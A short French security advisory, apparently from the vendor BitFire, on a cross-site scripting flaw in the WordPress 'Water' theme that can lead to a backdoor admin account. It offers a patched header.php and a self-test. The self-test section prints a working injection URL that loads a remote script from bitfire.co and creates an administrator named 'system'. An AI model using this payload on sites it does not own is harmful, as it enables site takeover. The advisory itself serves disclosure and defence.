Le thème WordPress Water permet aux attaquants d'obtenir des privilèges administratifs.

Le 6 août 2021, BitFire a publié une vulnérabilité de scripting intersite pour le thème WordPress water. Au moment de la rédaction de cet article, plusieurs centaines de sites Web utilisent actuellement ce thème. La faille est introduite à partir de plusieurs variables GET non vérifiées ajoutées à une balise de lien dans le <head> de la page. Possibilité de compromettre tout le site.

Cette faille permet à un attaquant de créer un lien vers le site Web cible qui, lorsqu'il est cliqué par l'administrateur du site, peut entraîner la création d'un compte administrateur backdoor sur le site vulnérable. Le compte backdoor peut ensuite être utilisé pour télécharger des logiciels malveillants sur le site cible et limiter l'accès à l'administrateur du site réel.

Le développeur du thème n'a pas pu être joint pour créer un correctif pour ce problème. Le fichier patch suivant est fourni par BitFire. Télécharge le fichier header.php corrigé avec ce lien : header.php. puis remplace le fichier wp-content/themes/water/header.php par cette version corrigée.

Confirmation de la vulnérabilité

Si ton site est vulnérable, tu peux visiter n'importe quel article (pas la page d'accueil) de ton site et ajouter ce qui suit à cette URL :

?preview=true&stylesheet="><script+src=https://bitfire.co/tools/wpadmin.php><&template=z

Si ton site est vulnérable, un nouvel utilisateur administrateur nommé system sera créé avec le mot de passe piraté. Assure-toi de supprimer ce compte après. Si le correctif réussit, ou si ton site exécute un pare-feu WordPess, aucun compte utilisateur ne sera créé.

Les clients BitFire sont déjà protégés contre cette vulnérabilité et des centaines d'autres. Consulte notre guide pour sécuriser ton site WordPress ou tout autre site PHP pour obtenir des instructions sur la manière d'empêcher le piratage de ton site.